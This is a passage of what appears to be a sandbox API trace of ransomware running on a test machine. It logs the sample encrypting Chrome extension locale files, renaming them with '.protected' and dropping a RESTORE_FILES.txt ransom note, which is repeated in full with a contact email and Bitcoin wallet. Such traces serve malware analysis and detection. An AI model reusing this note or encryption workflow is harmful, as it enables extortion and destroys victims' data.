hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.608] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\RESTORE_FILES.txt") returned 168 [0083.608] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hi\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.608] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.608] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.609] lstrlenA (lpString="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") returned 684 [0083.609] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: 
lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.609] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.609] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.609] CloseHandle (hObject=0x164) returned 1 [0083.609] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.609] lstrcmpiW (lpString1="hr", lpString2="Windows") returned -1 [0083.609] lstrcmpiW (lpString1="hr", lpString2="Program Files") returned -1 [0083.609] lstrcmpiW (lpString1="hr", lpString2="Program Files (x86)") returned -1 [0083.609] lstrcmpiW (lpString1="hr", lpString2="$Recycle.bin") returned 1 [0083.609] lstrcmpiW (lpString1="hr", lpString2="System Volume Information") returned -1 [0083.609] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr") returned 150 [0083.610] lstrcmpW (lpString1="hr", lpString2=".") returned 1 [0083.610] lstrcmpW (lpString1="hr", lpString2="..") returned 1 [0083.610] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\*") returned 152 [0083.610] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.610] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.610] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.610] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.610] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.610] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.610] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\.") returned 152 [0083.610] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.610] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.610] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.610] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.610] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.610] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.610] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.610] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\..") returned 153 [0083.610] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.610] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.610] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.610] lstrcmpiW (lpString1="messages.json", 
lpString2="Windows") returned -1 [0083.610] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.610] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.610] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.610] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.610] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\messages.json") returned 164 [0083.610] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.610] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.610] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.610] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.610] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.611] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\messages.json") returned 164 [0083.611] StrStrW 
(lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.611] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\messages.json") returned 164 [0083.611] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.611] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\messages.json") returned 164 [0083.611] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.611] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.614] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.614] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.618] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.618] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.619] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.619] CloseHandle (hObject=0x168) returned 1 [0083.619] wnsprintfW (in: 
pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\messages.json.protected") returned 174 [0083.619] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\messages.json.protected")) returned 1 [0083.620] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.620] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.620] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\RESTORE_FILES.txt") returned 168 [0083.620] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 
data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.622] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.622] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.623] lstrlenA 
(lpString="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") returned 684 [0083.623] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.623] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.623] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.623] CloseHandle (hObject=0x164) returned 1 [0083.623] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.623] lstrcmpiW (lpString1="hu", lpString2="Windows") returned -1 [0083.623] lstrcmpiW (lpString1="hu", lpString2="Program Files") returned -1 [0083.623] lstrcmpiW (lpString1="hu", lpString2="Program Files (x86)") returned -1 [0083.623] lstrcmpiW (lpString1="hu", lpString2="$Recycle.bin") returned 1 [0083.623] lstrcmpiW (lpString1="hu", lpString2="System Volume Information") returned -1 [0083.623] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu") returned 150 [0083.623] lstrcmpW (lpString1="hu", lpString2=".") returned 1 [0083.623] lstrcmpW (lpString1="hu", lpString2="..") returned 1 [0083.623] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\*") returned 152 [0083.623] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.623] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.623] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.623] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.623] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.624] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.624] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\.") returned 152 [0083.624] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.624] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.624] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.624] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.624] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.624] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.624] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.624] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\..") returned 153 [0083.624] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.624] 
lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.624] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.624] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.624] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.624] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.624] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.624] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.624] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\messages.json") returned 164 [0083.624] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.624] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.624] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.624] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.624] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.625] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\messages.json") returned 164 [0083.625] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.625] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\messages.json") returned 164 [0083.625] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.625] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\messages.json") returned 164 [0083.625] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.625] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.634] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.634] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.635] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.635] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.643] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, 
lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.643] CloseHandle (hObject=0x168) returned 1 [0083.651] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\messages.json.protected") returned 174 [0083.651] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\messages.json.protected")) returned 1 [0083.652] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.652] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.652] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\RESTORE_FILES.txt") returned 168 [0083.652] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.653] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.653] WriteFile (in: hFile=0x164, 